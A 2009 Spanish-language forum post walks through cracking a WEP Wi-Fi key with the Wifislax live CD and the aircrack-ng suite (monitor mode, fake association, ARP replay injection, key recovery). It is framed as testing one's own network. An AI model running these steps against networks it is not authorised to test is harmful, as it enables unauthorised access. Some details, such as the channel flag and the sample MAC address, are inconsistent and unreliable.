Spyke
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.

crakear web con Wifixslan. XD

Ir abajo

crakear web con Wifixslan. XD Empty crakear web con Wifixslan. XD

Mensaje  FRANKLIN xD Mar Dic 15, 2009 11:39 am

Buenas tardes a todos!

Quiero comentarles mi experiencia personal con respecto a las redes wifi y sus famosas claves. Con este post no quiero hacer apología del delito, solo es para los que tal vez quieran probar la seguridad de sus redes o se han olvidado la clave WEP y no quieren resetear el MODEM.

Un día me puse a pensar, siendo usuario de Wifi (por comodidad mas que nada), que no quiero que me roben Internet. Esta muy de moda, "colarse" a las redes sin seguridad de los vecinos y allegados. Y pensé "¿como podían llegar a robarme a mi, si tengo clave!?" Leyendo en foros y videos de you tube, me di cuenta que estaba muy equivocado. Por suerte tengo clave WPA2, la cual es muy segura y casi no se puede averiguar. Pero decidí colocar una clave WEP de 5 caracteres y probar cuanto tardaba en descubrirla (no es muy segura) como hace la mayoría de la gente.

Utilice la ultima versión de Wifislax 3.1 que encontramos en http://download.wifislax.com:8080/wifislax-3.1.iso Es un Live CD (Live CD se le llama a los sistemas operativos que se cargan en un CD y al inicia la PC bootean desde el CD y cargan el sistema operativo en memoria RAM, de esta forma no alteran ninguna información del HD, aparte nos dan la opción de instalarlo luego en el disco).
crakear web con Wifixslan. XD Thump_2278797wifislax


Una vez cargado este sistema operativo Linux, empecé a intentar usar las herramientas para ver que podía hacer. Sin éxito. No detectaba la placa inalámbrica. Me di cuenta que el chip de la placa era un RT8187B y el Wifislax no trae los drivers para esta placa (lo verifiqué utilizando el Everest (http://www.lavalys.com/products.php?ps=UE&lang=en&page=9).
Reinicie la PC, cargue Windows y me puse a investigar arduamente en foros, a ver que conseguía. No tuve mucho éxito, todos los foros decían que esa placa no iba a andar, que era una basura. No había ninguna explicación. Al menos conseguí los drivers de la placa para Linux y decidí que tenía que intentar todo antes de rendirme, aparte quería investigar y me dio mucha bronca que mi placa no fuera compatible (al menos eso dice en los foros). Aquí les dejo los drivers http://www.wikiupload.com/download_page.php?id=112800
Los pedi directamente a uno de los encargados de software de realtek (lo contacte por mail con mi spanglish, jojo)

Copie los drivers en el C:/ (gracias a dios Wifislax monta automáticamente todas las unidades que detecta al inicio, aunque sean NTFS), mediante Windows busque la MAC ADD de la placa (la obtuve mediante la consola de DOS, colocas ipconfig -all y la anotamos, nos tiene que dar un numero tipo 11:22:3T:445:66, pueden ser letras y números) y reinicie la pc, volví a colocar el LiveCD, inicie nuevamente Wifislax y copie los drivers del disco duro (/mnt/sda1) al directorio ROOT. Abri una nueva consola y escribí:
(usualmente las consolas están iniciadas en la carpeta root, en donde hemos guardado nuestro archivo)

tar -xvf rtl8187B_linux_26.1052.0225.2009.release.tar.gz (el ultimo es el nombre del archivo, si no lo cambiaron lo dejan así tal cual)

cd rtl8187B_linux_26.1052.0225.2009.release (con esto ingresamos al directorio donde están los drivers)

make (con este comando instalamos los drivers)

./wlan0up (y ahora "levantamos" nuestra placa)

iwconfig (verificamos que ya esta la placa y que todos los parámetros normales)

abrimos una nueva consola

airodump-ng wlan0 (con este comando vemos las redes que estan a nuestro alcance, con su respectiva mac (bssid), canal (ch) y nombre (essid)

airmon-ng start wlan0 6 (de esta manera colocamos nuestra placa en modo monitor, para poder monitorear las redes del canal 6 (#CH) Nos tiene que aparecer un mensaje diciendo
Interface Chipset Driver
wlan0 RTL8187 r8187 (monitor mode enabled)

cerramos la consola y abrimos una nueva

airodump-ng –w /mnt/sda1/pass –c1 wlan0 (de esta forma empezamos a monitorear las redes del canal 6 y guardamos los resultados en la carpeta mnt que es donde se montan las unidades. Yo la guardare en sda1 que es la unidad C: de Windows con el nombre de pass).
crakear web con Wifixslan. XD Thump_2278873perfil211
abrimos una nueva consola y ponemos
aireplay-ng -1 30 –e NombreESSID –a MACROUTER –h MACNUESTRA wlan0 (con este comando creamos una asociación entre el router y la pc. Debemos intentar una y otra vez hasta que nos aparezca “association sucefull :-)”
crakear web con Wifixslan. XD Thump_2278710perfil1
si todo va bien, deberíamos ver algo así
crakear web con Wifixslan. XD Thump_2278716perfil2
abrimos otra consola y colocamos
aireplay-ng -3 –x600 –b MACROUTER –h MACNUESTRA wlan0 (con esto comenzamos a leer y enviar paquetes y recibir ARP y guardarlos)
crakear web con Wifixslan. XD Thump_2278727perfil3
una vez que tenemos una gran cantidad de IV´s (#DATA) (a una gran cantidad me refiero a arriba de 60.000 para claves WEP de 64 bits, o sea 5 caracteres ASCII, o arriba de 150.000 para contraseñas WEP de 128 bits o sea 13 caracteres ASCII)
crakear web con Wifixslan. XD Thump_2278734perfil4

abrimos una nueva consola y utilizaremos el siguiente comando

aircrack-ptw /mnt/sda1/pass-01.cap (aquí es donde habíamos generado el archivo. Ingresamos al directorio y nos fijamos cual de los archivos es el mas grande (en tamaño kb) y lo usaremos para averiguar la clave WEP en tan solo unos segundos, en este caso el mas grande era el pass-01.cap)
Por arte de magia (y algoritmos que ningún mago puede explicar) en tan solo un segundo obtuve la clave WEP en caracteres hexadecimales y ASCII. Pero estuve “conectado” unos 15 minutos.

crakear web con Wifixslan. XD Thump_2278869perfil5
Por arte de magia (y algoritmos que ningún mago puede explicar) en tan solo un segundo obtuve la clave WEP en caracteres hexadecimales y ASCII. Pero estuve “conectado” unos 15 minutos.

También pueden obtenerla mediante
aircrack-ng /mnt/sda1/pass-01.cap (tarda unos segundos mas) yo lo probé con los dos y dio el mismo resultadocrakear web con Wifixslan. XD Thump_2278745perfil11
y configuramos la conexión

iwconfig wlan0 mode managed essid NOMBREDESSID key CLAVEWEP

ahora obtenemos una dirección IP (esto demora unos segundos)

dhcpcd wlan0

probamos un ping al router
crakear web con Wifixslan. XD Thump_2278759perfil13

y podemos probar nuestra conexión con un ping a Google por ejemplo

ping www.google.com

crakear web con Wifixslan. XD Thump_2278765perfil14
y ya estamos conectados!

Si no nos agrada navegar por Linux, reiniciamos la PC y cuando vamos a conectaros a la red y nos pida la clave, colocamos la que nos dio el aircrack y listoooo!

Probe introducir una clave WEP de 128 bits (o sea 13 caracteres ASCII) y en 20 minutos la obtuve, de la misma manera que la anterior. Espero les sirva para poder probar la seguridad de sus redes.
En mi casa tengo puesta clave WPA2 y aun no la he podido descifrar con Wifislax, por lo que me parece lo mas seguro del momento.

Gracias a la gente del foro de seguridad de Wifislax, que han podido ayudar en mis dudas.

Y gracias a ustedes por leer

Saludos a todos..
FRANKLIN xD
FRANKLIN xD
Novato

Cantidad de envíos : 53
Puntos : 111475
Fecha de inscripción : 05/07/2009

Volver arriba Ir abajo

Volver arriba


 
Permisos de este foro:
No puedes responder a temas en este foro.